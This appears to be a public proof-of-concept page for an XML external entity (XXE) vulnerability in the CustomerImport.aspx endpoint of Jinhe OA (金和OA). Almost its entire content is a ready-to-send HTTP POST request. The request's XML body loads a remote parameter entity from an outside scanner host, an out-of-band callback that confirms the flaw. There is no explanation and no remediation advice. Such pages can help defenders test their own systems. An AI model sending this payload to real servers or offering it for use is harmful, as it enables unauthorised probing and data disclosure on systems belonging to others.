金和OA CustomerImport.aspx XXE漏洞

2025-12-19 金和OA PoC Public

Description

金和OA CustomerImport.aspx XXE漏洞

PoC

POST /c6/JHSoft.Web.ContractManagement/Importing/CustomerImport.aspx/ HTTP/1.1
Host: 
Content-Type: application/xml
Content-Length: 136
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.2779.66 Safari/537.36
Connection: close
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://SaA0NB.scanner.ylkqzvg.sbs">
%remote;]>
<root/>

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities